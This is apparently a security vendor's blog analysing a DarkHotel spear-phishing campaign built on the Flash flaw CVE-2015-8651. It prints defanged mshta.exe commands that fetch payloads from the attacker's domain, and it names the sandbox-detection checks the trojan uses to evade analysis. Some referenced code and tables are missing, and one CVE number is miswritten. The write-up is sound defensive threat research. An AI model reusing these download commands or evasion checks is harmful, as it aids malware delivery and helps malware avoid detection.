Anatomy of an active attack using CVE-2015-8651 from DarkHotel cybercriminal group
Mar 2 2016
On Dec 28 2015, Adobe has released security updates for Adobe Flash Player. These updates address 19 critical security vulnerabilities that could potentially allow an attacker to take control of the affected system, includes a fix for a vulnerability (CVE-2015-8651) that is said according to Adobe is being used in the limited, targeted attached in the wild.
The earliest infection for CVE-2015-8651 and the active threat attack from our tracking data is back to Dec 24 2015. It is four days before Adobe release the security patch for CVE-2015-8651. The infections we have been tracking are reported from
• North Korean
On Dec 31 2015, we published a blog in Chinese: “Executives from China enterprise are being targeted by DarkHotel cybercriminal group” (https://threatbook.cn/blog_detail?id=4) about this active attack using CVE-2015-8651 that we identified in China. In this blog, we will provide more in depth technical analysis about attack’s functionalities implementation, anti-analysis and anti-detection techniques and concluded analysis about the cybercriminal group behind the attack.
How - Attack vector
An active attack using flash zero-day vulnerability patched in CVE-2016-8651 (Adobe release OOB patch on Dec 28 2015) has been spread via spear phishing email since Dec 24 2015. The crafted SWF file exploiting CVE-2015-8651 vulnerability is embedded as a downloadable link in a word document used in email attachment.
The earliest infection report we received is back to Dec 24 2015. It is four days before Adobe release the security patch for CVE-2015-8651. The infections are from China, Russian, North Korean.
When the SWF link is clicked, the crafted SWF exploits CVE-2015-8651 and triggers following shellcode be executed:
The main function of payload is to download a file named updata.exe and save it under system %temp% folder. It decrypts the content and constructs a valid PE by adding MZ header via ECHO command.
What – Malicious Payload Analysis
The downloaded updata.exe has following file property metadata. It is a crafted version of OpenSSL 1.0.1l.
Disguising itself as a component of OpenSSL, Updata.exe is actually a Trojan downloader, it attempts to download further malicious components and execute them via mshta.exe.
- C:Windowssystem32mshta.exe hxxp://manage-163-account.com/image/read.php?g0HNwgjM2QDN0kDNCFTLBZDM10iNwATQtY0MEJULEBzQxkjQ0Aze
- C:Windowssystem32mshta.exe hxxp://manage-163-account.com/image/read.php?gws_rd=NjdFQzgzNTgzNzgy&gfe_rd=QzB2NDAwMDFFMDAwNTA2Nmw0Mi01UDEwNEE1MDBzOTAwMGkwRERDNg==
- C:Windowssystem32mshta.exe hxxp://manage-163-account.com/image/read.php?gfe_rd=QzB2NDAwMDFFMDAwNTA2Nmw0Mi01UDEwNEE1MDBzOTAwMGkwRERDNg==&gws_rd=MUU1MTcxODY3RTJB
The strings in updata.exe are heavily encrypted in the payload file. The decryption happens dynamically in the memory. The decryption function is called to decrypt the string, library name or process API when they are needed. The decrypted string, library name or process API name’s memory block is set with non-related text data after they have been used. By using this technique, it attempts to anti memory tracking, memory dump which are common practice security researchers use while analyzing malware.
Here is a code snip extracted from payload for this technique described above
The input parameters for function m_CreateFileA are all decrypted dynamically. Function API CreateFileA is also dynamically decrypted from an encrypted table.
gEncApis and gEncWinDlls point to the encrypted string table for function APIs names and Windows library names. This is after they are decrypted:
DynMem_Erase is the function to wipe out the decrypted memory block.
In addition to encryption, it also applies anti-sandbox and anti-anti-virus techniques to evade being detected.
• Checking whether module path contains any of the following strings which are related with sandbox analysis environment:
• Enumerating the running process and compare their process name with the hard coded string list. If any of string is matched, it exits
• Checking following export functions in all loaded modules’ export table, which is commonly used by sandbox.
- "SbieDll_RunSandboxed": Sandboxie user mode hooking DLL
- “hook_disable_retaddr_check": Cuckoo user mode DLL
- “PinWinMain": PIntool (Intel PIN) DBI
- “dr_app_running_under_dynamorio": Dynamo RIO DBI
• Checking whether user account contains following key strings, which is related to commonly known sandbox.
• Checking whether running process name contains the following key strings, which is commonly known anti-virus program.
Who – group behind the attack
Based on our analysis about infection chains, tools and techniques used in the attack, the cybercriminal group behind this attack-- DarkHotel, started to surface.
DarkHotel APT attacks can be traced back in 2007. Since 2010, the attacks have been targeting corporate executives during their business travel, attempting to plant backdoor Trojan on their system and stealing business intelligence when they tried to connect hotel’s network connection. Therefore, in 2013, Kaspersky released a research report for this APT group and named it "DarkHotel". The targets of DarkHotel APT attacks are usually from Asia-Pacific business executives and senior staff, such as CEO, SVP, executives and senior research staff. The targeted industries of DarkHotel APT attacks are usually electronics manufacturing, telecommunications, investment, defense industry, automobile and so on.
Since 2013, the infection chains and techniques used in each DarkHotel APT attacks are similar. The infection vector starts with spear phishing email attached an office document with flash link embedded. The flash link leads to a crafted SWF file exploiting flash player zero-day vulnerabilities and carries out attacks. The zero-day vulnerability it used in this APT attack is CVE-2015-8651. To avoid the latest anti-virus detections, it applies multiple techniques similar to what we described above in this round attack.
The follow table lists attack characteristics from DarkHotel group and comparison between latest attack and its precedents:
Indicators of Compromise (IOC)
Crafted SWF files exploits CVE-2015-8651 (MD5)
Trojan Downloader downloaded by SWF (MD5)
The domain host HTA files: